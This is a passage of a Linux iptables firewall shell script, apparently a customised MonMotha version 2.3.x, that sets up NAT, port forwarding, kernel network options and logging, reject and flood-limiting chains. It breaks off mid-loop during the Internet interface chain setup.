# version 2.3.3-pre1: Reject with tcp-reset for TCP option |
# Removed the huge list of censorship |
# Moved the port forwards to stable options |
# Moved the TOS mangling to stable options |
# Check before enabling IP Forwarding and |
# IP SynCookies |
# Don't run censorship loop if no rules |
# Request low latency TOS on UDP packets for |
# games on ports 4000-7000 (Diablo II) |
# Fix bad syntax in the port forwarding loops |
# Reversed DMZIN and DMZOUT fixed |
# Various syntax fixes |
# Stateful inspection on forward chain |
# Other stateful matching changes |
# version 2.3.2: Fixed bad syntax in DMZ_IFACE loop |
# version 2.3.2-pre2: Put a real liscense on it (BSD liscense) |
# Changed format of ALLOW_HOSTWISE and |
# DENY_HOSTWISE to be less confusing |
# (the ":" was changed to ">") |
# Added LOG_FLOOD option to tweak log limit |
# Added SYN_FLOOD option to tweak SYN limit |
# Added PING_FLOOD option to tweak PING limit |
# version 2.3.2-pre1: Stateful matching on active FTP and SSH |
# rules (thanks to Len Padilla) |
# Fixed a minor bug in chain creation order |
# (thanks to Peter Lindman) |
# TOS Optimizations (thanks to vesa alatalo) |
# Begin DMZ Support |
# Proofread comments and correct |
# Use BASH builtins instead of sed |
# (thanks to Craig Ludington) |
# Fixed "USE_SNAT" bug in port forwarding |
# (has been changed to "SNAT_LAN") |
# (thanks to Frdric Marchand) |
# Tuned down default TCP allows (remove POP3) |
# version 2.3.1: Option for 1:1 or subnet:1 static NAT |
# Internet censorship options |
# version 2.3.1-pre2: Added option to deny specific ports from |
# specific hosts |
# Added limiting to logging chains to prevent |
# log DoSing |
# Spiffed up comments |
# Changed the "AUTH_ALLOW" and "DNS" options |
# to be more generic and flexible |
# version 2.3.1-pre1: Updated comments for new kernel version |
# Removed double drop setting |
# Updated for iptables-1.2 |
# Began a kernel option list |
# version 2.3.0: No changes from pre1g |
# version 2.3.0-pre1g: Tuned down default TCP allows |
# Restructure to SSH loop |
# Status Reporting Fixes (newlines, etc.) |
# Fix log prefix length on accept loops |
# version 2.3.0-pre1f: Moved the ICMP echo-request limit to where |
# it should have been |
# Allows the rest of the ICMP like it should |
# Remove the interface matching from ICMP |
# echo-request (not needed) |
# version 2.3.0-pre1e: Fixed an issue in the invalid matching |
# version 2.3.0-pre1d: Spiffed up comments |
# Port Forwarding |
# Moved the deny setting to normal options |
# version 2.3.0-pre1c: Minor fixes that don't (currently) affect |
# functionality |
# version 2.3.0-pre1b: Security fix documented in 2.1.13 |
# Slight logic change in TCP_ALLOW loop |
# Don't print allow messages if nothign is |
# allowed by that loop |
# Changed IPTables download URL |
# version 2.3.0-pre1a: Initial branch from 2.1.12 |
# Add stuff in release notes except port fw |
# ----------------------------------------------------------------------|
# You NEED to set this! |
# Configuration follows: |
# |
# Main configuration, modify to suit your setup. Help can be found at:
# -------------------------------------------------------------------------
# |!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!|
# |!*********************************************************************!|
# |!*** http://www.mplug.org/phpwiki/index.php?MonMothaReferenceGuide ***!|
# |!*********************************************************************!|
# |!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!|
# -------------------------------------------------------------------------
# --------------------------READ THE URL ABOVE!----------------------------
# -------------------------------------------------------------------------
### BEGIN INIT INFO
# Provides: transparentproxy
# Required-Start: $local_fs $syslog $remote_fs dbus
# Required-Stop: $local_fs $syslog $remote_fs
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Start transparentproxy
### END INIT INFO
# Port Maps
# TCP
# 22 = SSH
# 21 = FTP
# 25 = SMTP
# 80 = HTTP
# 113 = AUTH
# 1723 = PPTP
# 5631 = PcAnywhere DATA
# 522 = NetMeeting 'User Location Server'
# 389 = NetMeeting 'Internet Locator Server'
# 1503 = NetMeeting 'T.120'
# 1718 = NetMeeting/H323 'GateDiscovery'
# 1719 = NetMeeting/H323 'RAS/GateStatus'
# 1720 = NetMeeting/H323 'H.323 call setup/HostCall'
# 1731 = NetMeeting 'Audio call control'
# 1723 = PPTP MS
# 1002 =
# 2345 = LDAP2 Server for NetMeeting ILS
# 39000:39001 = GNU H323 Proxy Gateway 'T120PortRange'
# 5000:5004 = GNU H323 Proxy Gateway 'H.245 Tunneling '
# 5120:5220 = NeverWinterNights Linux Server
# 30000:30010 = GNU H323 Proxy Gateway 'H.245 channel'
# 20000:20020 = GNU H323 Proxy Gateway 'Q931PortRange'
# 40000:40001 = TeamSound
# 5222 = Jabber Server
# 5269 = Jabber Server
# UDP
# 21 = FTP
# 22 = SSH
# 25 = SMTP
# 80 = HTTP
# 113 = AUTH
# 68 = BOOTPC
# 6112 = Xwindows??
# 6119 = Xwindows??
# 4000 = ICQ??
# 1718:1723 = Netmeeting
# 1723 = PPTP MS
# 5631 = PcAnywhere
# 389 = NetMeeting 'Internet Locator Server'
# 5120:5220 = NeverWinterNights Linux Server
# 6500 = NeverWinterNights
# 27900 = NeverWinterNights
# 28900 = NeverWinterNights
# 40011:40200 = TeamSound
# 40002:40004 = TeamSound
# 5000:5004 = GNU H323 Proxy Gateway 'H.245 Tunneling'
# 5222 = Jabber Server
# 5269 = Jabber Server
# Main Options
IPTABLES="/sbin/iptables"
TCP_ALLOW="20 21 22 25 80 113 1723 1701 500 4000 4662 6666"
UDP_ALLOW="20 21 22 25 80 113 1723 1701 500 68 4000 6112 6119 7383 6666"
INET_IFACE="eth1"
LAN_IFACE="eth2"
INTERNAL_LAN="192.168.42.0/24"
MASQ_LAN="192.168.42.0/24"
SNAT_LAN=""
DROP="TREJECT"
DENY_ALL=""
DENY_HOSTWISE_TCP=""
DENY_HOSTWISE_UDP=""
BLACKHOLE=""
BLACKHOLE_DROP="DROP"
ALLOW_HOSTWISE_TCP="64.201.177.23/0>143"
ALLOW_HOSTWISE_UDP="64.201.177.23/0>143"
TCP_FW="4662:4662>192.168.0.2"
UDP_FW="7383:7383>192.168.0.2"
MANGLE_TOS_OPTIMIZE="FALSE"
DHCP_SERVER="TRUE"
BAD_ICMP="5 9 10 15 16 17 18"
ENABLE="Y"
# Flood Params
LOG_FLOOD="2/s"
SYN_FLOOD="20/s"
PING_FLOOD="1/s"
# Outbound filters
# FIXME: Update config help wiki then remove one-liner help
ALLOW_OUT_TCP="" # Internal hosts allowed to be forwarded out on TCP (do not put this/these host/s in INTERNAL_LAN, but do define their method of access [snat, masq] if not a public ip)
PROXY="" # Redirect for Squid or other TRANSPARENT proxy. Syntax to specify the proxy is "host:port".
MY_IP="" # Set to the internal IP of this box (with the firewall), only needed for PROXY=
# Below here is experimental (please report your successes/failures)
MAC_MASQ="" # Currently Broken
MAC_SNAT="" # Ditto...
TTL_SAFE=""
USE_SYNCOOKIES="FALSE"
RP_FILTER="TRUE"
ACCEPT_SOURCE_ROUTE="FALSE"
SUPER_EXEMPT=""
BRAINDEAD_ISP="FALSE"
ALLOW_HOSTWISE_PROTO="0/0>47 0/0>50 0/0>51"
# Only touch these if you're daring (PREALPHA stuff, as in basically non-functional)
DMZ_IFACE="" # Interface your DMZ is on (leave blank if you don't have one) - Obsolete: Will be removed before 2.4.0
# ----------------------------------------------------------------------|
# These control basic script behavior; there should be no need to |
# change any of these settings for normal use. |
# ----------------------------------------------------------------------|
FILTER_CHAINS="INETIN INETOUT DMZIN DMZOUT TCPACCEPT UDPACCEPT LDROP LREJECT LTREJECT TREJECT"
UL_FILTER_CHAINS="ULDROP ULREJECT ULTREJECT"
LOOP_IFACE="lo"
# Colors
NORMAL="\033[0m"
GREEN=$'\e[32;01m'
YELLOW=$'\e[33;01m'
RED=$'\e[31;01m'
NORMAL=$'\e[0m'
# Undocumented Features
OVERRIDE_NO_FORWARD="FALSE"
OVERRIDE_SANITY_CHECKS="FALSE"
# ----------------------------------------------------------------------|
# You shouldn't need to modify anything below here |
# Main Script Starts |
# ----------------------------------------------------------------------|
# Let's load it!
echo "Loading iptables firewall:"
modprobe ip_conntrack_ftp ports=6666
modprobe ip_nat_ftp ports=6666
# Configuration Sanity Checks
echo -n "Checking configuration..."
if [ "$OVERRIDE_SANITY_CHECKS" = "TRUE" ] ; then
echo "skipped! If it breaks, don't complain!"
echo "If there's a reason you needed to do this, please report to the developers list!"
echo
echo -n "Wait 5 seconds..."
sleep 5
echo "continuing"
echo
echo
else
# Has it been configured?
if ! [ "$ENABLE" = "Y" ] ; then
echo
echo "${RED}You need to *EDIT YOUR CONFIGURATION* and set ENABLE to Y!"
echo "${YELLOW}End User Liscense Agreement:${NORMAL}"
echo -n "$GREEN"
cat << EOF
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1.Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2.Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
3.The name of the author may not be used to endorse or promote
products derived from this software without specific prior
written permission.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN
IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
EOF
echo "${RED}You need to *EDIT YOUR CONFIGURATION* and set ENABLE to Y!${NORMAL}"
exit 99
fi
# It's hard to run an iptables script without iptables...
if ! [ -x $IPTABLES ] ; then
echo
echo "ERROR IN CONFIGURATION: ${IPTABLES} doesn't exist or isn't executable!"
exit 4
fi
# Basic interface sanity
for dev in ${LAN_IFACE} ; do
if [ "$dev" = "${DMZ_IFACE}" ] && [ "$dev" != "" ]; then
echo
echo "ERROR IN CONFIGURATION: DMZ_IFACE and LAN_IFACE can't have a duplicate interface!"
exit 1
fi
done
# Create a test chain to work with for system ablilities testing
${IPTABLES} -N SYSTEST
if [ "$?" != "0" ] ; then
echo
echo "IPTABLES can't create new chains or the script was interrupted previously!"
echo "Flush IPTABLES rulesets and chains and try again."
exit 4
fi
# Check for ULOG support
${IPTABLES} -A SYSTEST -j ULOG > /dev/null 2>&1
if [ "$?" = "0" ] ; then
HAVE_ULOG="true"
else
HAVE_ULOG="false"
fi
# Check for LOG support
${IPTABLES} -A SYSTEST -j LOG > /dev/null 2>&1
if [ "$?" != "0" ] ; then
echo
echo "Your kernel lacks LOG support reqiored by this script. Aborting."
exit 3
fi
# Check for stateful matching
${IPTABLES} -A SYSTEST -m state --state ESTABLISHED -j ACCEPT > /dev/null 2>&1
if [ "$?" != "0" ] ; then
echo
echo "Your kernel lacks stateful matching, this would break this script. Aborting."
exit 3
fi
# Check for the limit match
${IPTABLES} -A SYSTEST -m limit -j ACCEPT > /dev/null 2>&1
if [ "$?" != "0" ] ; then
echo
echo "Support not found for limiting needed by this script. Aborting."
exit 3
fi
# Check for REJECT
${IPTABLES} -A SYSTEST -j REJECT > /dev/null 2>&1
if [ "$?" != "0" ] ; then
echo
echo "Support not found for the REJECT target needed by this script. Aborting."
exit 3
fi
# Check DROP sanity
if [ "$DROP" = "" ] ; then
echo
echo "There needs to be a DROP policy (try TREJECT)!"
exit 1
fi
if [ "$DROP" = "ACCEPT" ] ; then
echo
echo "The DROP policy is set to ACCEPT; there is no point in loading the firewall as there wouldn't be one."
exit 2
fi
if [ "$DROP" = "ULDROP" ] || [ "$DROP" = "ULREJECT" ] || [ "$DROP" = "ULTREJECT" ] ; then
if [ "$HAVE_ULOG" != "true" ] ; then
echo
echo "You have selected a ULOG policy, but your system lacks ULOG support."
echo "Please choose a policy that your system has support for."
exit 5
fi
fi
# Problems with blackholes?
if [ "$BLACKHOLE" != "" ] && [ "$BLACKHOLE_DROP" = "" ] ; then
echo
echo "You can't use blackholes and not have a policy for them!"
exit 1
fi
# Flush and remove the chain SYSTEST
${IPTABLES} -F SYSTEST
${IPTABLES} -X SYSTEST
# Seems ok...
echo "passed"
fi #from override option
# ===============================================
# ----------------Preprocessing------------------
# ===============================================
# Turn TCP_ALLOW and UDP_ALLOW into ALLOW_HOSTWISE
echo -n "Performing TCP_ALLOW and UDP_ALLOW alias preprocessing..."
if [ "$TCP_ALLOW" != "" ] ; then
for rule in ${TCP_ALLOW} ; do
ALLOW_HOSTWISE_TCP="${ALLOW_HOSTWISE_TCP} 0/0>$rule"
done
fi
if [ "$UDP_ALLOW" != "" ] ; then
for rule in ${UDP_ALLOW} ; do
ALLOW_HOSTWISE_UDP="${ALLOW_HOSTWISE_UDP} 0/0>$rule"
done
fi
echo "done"
# ===============================================
# -------Set some Kernel stuff via SysCTL--------
# ===============================================
# Turn on IP forwarding
if [ "$INTERNAL_LAN" != "" ] && [ "$OVERRIDE_NO_FORWARD" != "TRUE" ] ; then
echo -n "Checking IP Forwarding..."
if [ -e /proc/sys/net/ipv4/ip_forward ] ; then
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "enabled."
else
echo "support not found! This will cause problems if you need to do any routing."
fi
fi
# Enable TCP Syncookies
echo -n "Checking IP SynCookies..."
if [ -e /proc/sys/net/ipv4/tcp_syncookies ] ; then
if [ "$USE_SYNCOOKIES" = "TRUE" ] ; then
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
echo "enabled."
else
echo 0 > /proc/sys/net/ipv4/tcp_syncookies
echo "disabled."
fi
else
echo "support not found, but that's OK."
fi
# Enable Route Verification to prevent martians and other such crud that
# seems to be commonplace on the internet today
echo -n "Checking Route Verification..."
if [ "$INET_IFACE" != "" ] ; then
for dev in ${INET_IFACE} ; do
if [ -e /proc/sys/net/ipv4/conf/$dev/rp_filter ] ; then
if [ "$RP_FILTER" = "TRUE" ] ; then
echo 1 > /proc/sys/net/ipv4/conf/$dev/rp_filter
echo -n "activated:$dev "
else
echo 0 > /proc/sys/net/ipv4/conf/$dev/rp_filter
echo -n "disabled:$dev "
fi
else
echo "not found:$dev "
fi
done
fi
if [ "$LAN_IFACE" != "" ] ; then
for dev in ${LAN_IFACE} ; do
if [ -e /proc/sys/net/ipv4/conf/$dev/rp_filter ] ; then
if [ "$RP_FILTER" = "TRUE" ] ; then
echo 1 > /proc/sys/net/ipv4/conf/$dev/rp_filter
echo -n "activated:$dev "
else
echo 0 > /proc/sys/net/ipv4/conf/$dev/rp_filter
echo -n "disabled:$dev "
fi
else
echo "not found:$dev "
fi
done
fi
if [ "$DMZ_IFACE" != "" ] ; then
if [ -e /proc/sys/net/ipv4/conf/$DMZ_IFACE/rp_filter ] ; then
if [ "$RP_FILTER" = "TRUE" ] ; then
echo 1 > /proc/sys/net/ipv4/conf/$DMZ_IFACE/rp_filter
echo -n "activated:${DMZ_IFACE} "
else
echo 0 > /proc/sys/net/ipv4/conf/$DMZ_IFACE/rp_filter
echo -n "disabled:${DMZ_IFACE} "
fi
else
echo "not found:${DMZ_IFACE} "
fi
fi
echo
# Tell the Kernel to Ignore Source Routed Packets
echo -n "Refusing Source Routed Packets via SysCtl..."
if [ "$INET_IFACE" != "" ] ; then
for dev in ${INET_IFACE} ; do
if [ -e /proc/sys/net/ipv4/conf/$dev/accept_source_route ] ; then
if [ "$ACCEPT_SOURCE_ROUTE" = "TRUE" ] ; then
echo "1" > /proc/sys/net/ipv4/conf/$dev/accept_source_route
echo -n "disabled:$dev "
else
echo "0" > /proc/sys/net/ipv4/conf/$dev/accept_source_route
echo -n "activated:$dev "
fi
else
echo "not found:$dev "
fi
done
fi
if [ "$LAN_IFACE" != "" ] ; then
for dev in ${LAN_IFACE} ; do
if [ -e /proc/sys/net/ipv4/conf/$dev/accept_source_route ] ; then
if [ "$ACCEPT_SOURCE_ROUTE" = "TRUE" ] ; then
echo "1" > /proc/sys/net/ipv4/conf/$dev/accept_source_route
echo -n "disabled:$dev "
else
echo "0" > /proc/sys/net/ipv4/conf/$dev/accept_source_route
echo -n "activated:$dev "
fi
else
echo "not found:$dev "
fi
done
fi
if [ "$DMZ_IFACE" != "" ] ; then
if [ -e /proc/sys/net/ipv4/conf/$DMZ_IFACE/accept_source_route ] ; then
if [ "$ACCEPT_SOURCE_ROUTE" = "TRUE" ] ; then
echo "1" > /proc/sys/net/ipv4/conf/$DMZ_IFACE/accept_source_route
echo -n "disabled:${DMZ_IFACE} "
else
echo "0" > /proc/sys/net/ipv4/conf/$DMZ_IFACE/accept_source_route
echo -n "activated:${DMZ_IFACE} "
fi
else
echo "not found:${DMZ_IFACE} "
fi
fi
echo
# ===============================================
# --------Actual NetFilter Stuff Follows---------
# ===============================================
# Flush everything
# If you need compatability, you can comment some or all of these out,
# but remember, if you re-run it, it'll just add the new rules in, it
# won't remove the old ones for you then, this is how it removes them.
echo -n "Flush: "
${IPTABLES} -t filter -F INPUT
echo -n "INPUT "
${IPTABLES} -t filter -F OUTPUT
echo -n "OUTPUT1 "
${IPTABLES} -t filter -F FORWARD
echo -n "FORWARD "
${IPTABLES} -t nat -F PREROUTING
echo -n "PREROUTING1 "
${IPTABLES} -t nat -F OUTPUT
echo -n "OUTPUT2 "
${IPTABLES} -t nat -F POSTROUTING
echo -n "POSTROUTING "
${IPTABLES} -t mangle -F PREROUTING
echo -n "PREROUTING2 "
${IPTABLES} -t mangle -F OUTPUT
echo -n "OUTPUT3"
echo
# Create new chains
# Output to /dev/null in case they don't exist from a previous invocation
echo -n "Creating chains: "
for chain in ${FILTER_CHAINS} ; do
${IPTABLES} -t filter -F ${chain} > /dev/null 2>&1
${IPTABLES} -t filter -X ${chain} > /dev/null 2>&1
${IPTABLES} -t filter -N ${chain}
echo -n "${chain} "
done
if [ ${HAVE_ULOG} = "true" ] || [ ${HAVE_ULOG} = "" ] ; then
for chain in ${UL_FILTER_CHAINS} ; do
${IPTABLES} -t filter -F ${chain} > /dev/null 2>&1
${IPTABLES} -t filter -X ${chain} > /dev/null 2>&1
${IPTABLES} -t filter -N ${chain}
echo -n "${chain} "
done
fi
echo
# Default Policies
# INPUT policy is drop as of 2.3.7-pre5
# Policy can't be reject because of kernel limitations
echo -n "Default Policies: "
${IPTABLES} -t filter -P INPUT DROP
echo -n "INPUT:DROP "
${IPTABLES} -t filter -P OUTPUT ACCEPT
echo -n "OUTPUT:ACCEPT "
${IPTABLES} -t filter -P FORWARD DROP
echo -n "FORWARD:DROP "
echo
# ===============================================
# -------Chain setup before jumping to them------
# ===============================================
#These logging chains are valid to specify in DROP= above
#Set up LDROP
echo -n "Setting up drop chains chains: "
${IPTABLES} -t filter -A LDROP -p tcp -m limit --limit ${LOG_FLOOD} -j LOG --log-level 6 --log-prefix "TCP Dropped "
${IPTABLES} -t filter -A LDROP -p udp -m limit --limit ${LOG_FLOOD} -j LOG --log-level 6 --log-prefix "UDP Dropped "
${IPTABLES} -t filter -A LDROP -p icmp -m limit --limit ${LOG_FLOOD} -j LOG --log-level 6 --log-prefix "ICMP Dropped "
${IPTABLES} -t filter -A LDROP -f -m limit --limit ${LOG_FLOOD} -j LOG --log-level 4 --log-prefix "FRAGMENT Dropped "
${IPTABLES} -t filter -A LDROP -j DROP
echo -n "LDROP "
#And LREJECT too
${IPTABLES} -t filter -A LREJECT -p tcp -m limit --limit ${LOG_FLOOD} -j LOG --log-level 6 --log-prefix "TCP Rejected "
${IPTABLES} -t filter -A LREJECT -p udp -m limit --limit ${LOG_FLOOD} -j LOG --log-level 6 --log-prefix "UDP Rejected "
${IPTABLES} -t filter -A LREJECT -p icmp -m limit --limit ${LOG_FLOOD} -j LOG --log-level 6 --log-prefix "ICMP Rejected "
${IPTABLES} -t filter -A LREJECT -f -m limit --limit ${LOG_FLOOD} -j LOG --log-level 4 --log-prefix "FRAGMENT Rejected "
${IPTABLES} -t filter -A LREJECT -j REJECT
echo -n "LREJECT "
#Don't forget TREJECT
${IPTABLES} -t filter -A TREJECT -p tcp -j REJECT --reject-with tcp-reset
${IPTABLES} -t filter -A TREJECT -p udp -j REJECT --reject-with icmp-port-unreachable
${IPTABLES} -t filter -A TREJECT -p icmp -j DROP
${IPTABLES} -t filter -A TREJECT -j REJECT
echo -n "TREJECT "
#And LTREJECT
${IPTABLES} -t filter -A LTREJECT -p tcp -m limit --limit ${LOG_FLOOD} -j LOG --log-level 6 --log-prefix "TCP Rejected "
${IPTABLES} -t filter -A LTREJECT -p udp -m limit --limit ${LOG_FLOOD} -j LOG --log-level 6 --log-prefix "UDP Rejected "
${IPTABLES} -t filter -A LTREJECT -p icmp -m limit --limit ${LOG_FLOOD} -j LOG --log-level 6 --log-prefix "ICMP Rejected "
${IPTABLES} -t filter -A LTREJECT -f -m limit --limit ${LOG_FLOOD} -j LOG --log-level 4 --log-prefix "FRAGMENT Rejected "
${IPTABLES} -t filter -A LTREJECT -j TREJECT
echo -n "LTREJECT "
#And ULOG stuff, same as above but ULOG instead of LOG
if [ ${HAVE_ULOG} = "true" ] || [ ${HAVE_ULOG} = "" ] ; then
${IPTABLES} -t filter -A ULDROP -p tcp -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LDROP_TCP
${IPTABLES} -t filter -A ULDROP -p udp -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LDROP_UDP
${IPTABLES} -t filter -A ULDROP -p icmp -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LDROP_ICMP
${IPTABLES} -t filter -A ULDROP -f -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LDROP_FRAG
${IPTABLES} -t filter -A ULDROP -j DROP
echo -n "ULDROP "
${IPTABLES} -t filter -A ULREJECT -p tcp -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LREJECT_TCP
${IPTABLES} -t filter -A ULREJECT -p udp -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LREJECT_UDP
${IPTABLES} -t filter -A ULREJECT -p icmp -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LREJECT_UDP
${IPTABLES} -t filter -A ULREJECT -f -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LREJECT_FRAG
${IPTABLES} -t filter -A ULREJECT -j REJECT
echo -n "ULREJECT "
${IPTABLES} -t filter -A ULTREJECT -p tcp -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LTREJECT_TCP
${IPTABLES} -t filter -A ULTREJECT -p udp -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LTREJECT_UDP
${IPTABLES} -t filter -A ULTREJECT -p icmp -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LTREJECT_ICMP
${IPTABLES} -t filter -A ULTREJECT -f -m limit --limit ${LOG_FLOOD} -j ULOG --ulog-nlgroup 1 --ulog-prefix LTREJECT_FRAG
${IPTABLES} -t filter -A ULTREJECT -p tcp -j REJECT --reject-with tcp-reset
${IPTABLES} -t filter -A ULTREJECT -p udp -j REJECT --reject-with icmp-port-unreachable
${IPTABLES} -t filter -A ULTREJECT -p icmp -j DROP
${IPTABLES} -t filter -A ULTREJECT -j REJECT
echo -n "ULTREJECT "
fi
#newline
echo
# Set up the per-proto ACCEPT chains
echo -n "Setting up per-proto ACCEPT: "
# TCPACCEPT
# SYN Flood "Protection"
${IPTABLES} -t filter -A TCPACCEPT -p tcp --syn -m limit --limit ${SYN_FLOOD} -j ACCEPT
${IPTABLES} -t filter -A TCPACCEPT -p tcp --syn -m limit --limit ${LOG_FLOOD} -j LOG --log-prefix "Possible SynFlood "
${IPTABLES} -t filter -A TCPACCEPT -p tcp --syn -j ${DROP}
${IPTABLES} -t filter -A TCPACCEPT -p tcp ! --syn -j ACCEPT
# Log anything that hasn't matched yet and ${DROP} it since it isn't TCP and shouldn't be here
${IPTABLES} -t filter -A TCPACCEPT -m limit --limit ${LOG_FLOOD} -j LOG --log-prefix "Mismatch in TCPACCEPT "
${IPTABLES} -t filter -A TCPACCEPT -j ${DROP}
echo -n "TCPACCEPT "
#UDPACCEPT
${IPTABLES} -t filter -A UDPACCEPT -p udp -j ACCEPT
# Log anything not UDP and ${DROP} it since it's not supposed to be here
${IPTABLES} -t filter -A UDPACCEPT -m limit --limit ${LOG_FLOOD} -j LOG --log-prefix "Mismatch on UDPACCEPT "
${IPTABLES} -t filter -A UDPACCEPT -j ${DROP}
echo -n "UDPACCEPT "
#Done
echo
# =================================================
# -------------------Exemptions--------------------
# =================================================
if [ "$SUPER_EXEMPT" != "" ] ; then
echo -n "Super Exemptions: "
for host in ${SUPER_EXEMPT} ; do
${IPTABLES} -t filter -A INPUT -s ${host} -j ACCEPT
${IPTABLES} -t filter -A OUTPUT -d ${host} -j ACCEPT
${IPTABLES} -t filter -A FORWARD -s ${host} -j ACCEPT
${IPTABLES} -t filter -A FORWARD -d ${host} -j ACCEPT
echo -n "${host} "
done
echo
fi
# =================================================
# ----------------Explicit Denies------------------
# =================================================
#Blackholes will not be overridden by hostwise allows
if [ "$BLACKHOLE" != "" ] ; then
echo -n "Blackholes: "
for host in ${BLACKHOLE} ; do
${IPTABLES} -t filter -A INPUT -s ${host} -j ${BLACKHOLE_DROP}
${IPTABLES} -t filter -A OUTPUT -d ${host} -j ${BLACKHOLE_DROP}
${IPTABLES} -t filter -A FORWARD -s ${host} -j ${BLACKHOLE_DROP}
${IPTABLES} -t filter -A FORWARD -d ${host} -j ${BLACKHOLE_DROP}
echo -n "${host} "
done
echo
fi
if [ "$DENY_ALL" != "" ] ; then
echo -n "Denying hosts: "
for rule in ${DENY_ALL} ; do
echo "$rule" | {
IFS='<' read shost dhost
if [ "$dhost" == "" ] ; then
${IPTABLES} -t filter -A INPUT -s ${shost} -j ${DROP}
${IPTABLES} -t filter -A FORWARD -s ${shost} -j ${DROP}
else
${IPTABLES} -t filter -A INPUT -s ${shost} -d ${dhost} -j ${DROP}
${IPTABLES} -t filter -A FORWARD -s ${shost} -d ${dhost} -j ${DROP}
fi
}
echo -n "${rule} "
done
echo
fi
if [ "$DENY_HOSTWISE_TCP" != "" ] ; then
echo -n "Hostwise TCP Denies: "
for rule in ${DENY_HOSTWISE_TCP} ; do
echo "$rule" | {
IFS='><' read shost port dhost
echo "$port" | {
IFS='-' read fsp lsp
if [ "$dhost" == "" ] ; then
if [ "$lsp" != "" ] ; then
${IPTABLES} -t filter -A INPUT -p tcp -s ${shost} --dport ${fsp}:${lsp} -j ${DROP}
${IPTABLES} -t filter -A FORWARD -p tcp -s ${shost} --dport ${fsp}:${lsp} -j ${DROP}
else
${IPTABLES} -t filter -A INPUT -p tcp -s ${shost} --dport ${port} -j ${DROP}
${IPTABLES} -t filter -A FORWARD -p tcp -s ${shost} --dport ${port} -j ${DROP}
fi
else
if [ "$lsp" != "" ] ; then
${IPTABLES} -t filter -A INPUT -p tcp -s ${shost} -d ${dhost} --dport ${fsp}:${lsp} -j ${DROP}
${IPTABLES} -t filter -A FORWARD -p tcp -s ${shost} -d ${dhost} --dport ${fsp}:${lsp} -j ${DROP}
else
${IPTABLES} -t filter -A INPUT -p tcp -s ${shost} -d ${dhost} --dport ${port} -j ${DROP}
${IPTABLES} -t filter -A FORWARD -p tcp -s ${shost} -d ${dhost} --dport ${port} -j ${DROP}
fi
fi
echo -n "${rule} "
}
}
done
echo
fi
if [ "$DENY_HOSTWISE_UDP" != "" ] ; then
echo -n "Hostwise UDP Denies: "
for rule in ${DENY_HOSTWISE_UDP} ; do
echo "$rule" | {
IFS='><' read shost port dhost
echo "$port" | {
IFS='-' read fsp lsp
if [ "$dhost" == "" ] ; then
if [ "$lsp" != "" ] ; then
${IPTABLES} -t filter -A INPUT -p udp -s ${shost} --dport ${fsp}:${lsp} -j ${DROP}
${IPTABLES} -t filter -A FORWARD -p udp -s ${shost} --dport ${fsp}:${lsp} -j ${DROP}
else
${IPTABLES} -t filter -A INPUT -p udp -s ${shost} --dport ${port} -j ${DROP}
${IPTABLES} -t filter -A FORWARD -p udp -s ${shost} --dport ${port} -j ${DROP}
fi
else
if [ "$lsp" != "" ] ; then
${IPTABLES} -t filter -A INPUT -p udp -s ${shost} -d ${dhost} --dport ${fsp}:${lsp} -j ${DROP}
${IPTABLES} -t filter -A FORWARD -p udp -s ${shost} -d ${dhost} --dport ${fsp}:${lsp} -j ${DROP}
else
${IPTABLES} -t filter -A INPUT -p udp -s ${shost} -d ${dhost} --dport ${port} -j ${DROP}
${IPTABLES} -t filter -A FORWARD -p udp -s ${shost} -d ${dhost} --dport ${port} -j ${DROP}
fi
fi
echo -n "${rule} "
}
}
done
echo
fi
#Invalid packets are always annoying
echo -n "${DROP}ing invalid packets..."
${IPTABLES} -t filter -A INETIN -m state --state INVALID -j ${DROP}
echo "done"
# ------------------------------------------------------------------------
# Internet jumps to INET chains and DMZ
# Set up INET chains
echo -n "Setting up INET chains: "
for inetdev in ${INET_IFACE} ; do
${IPTABLES} -t filter -A INPUT -i $inetdev -j INETIN
for landev in ${LAN_IFACE} ; do
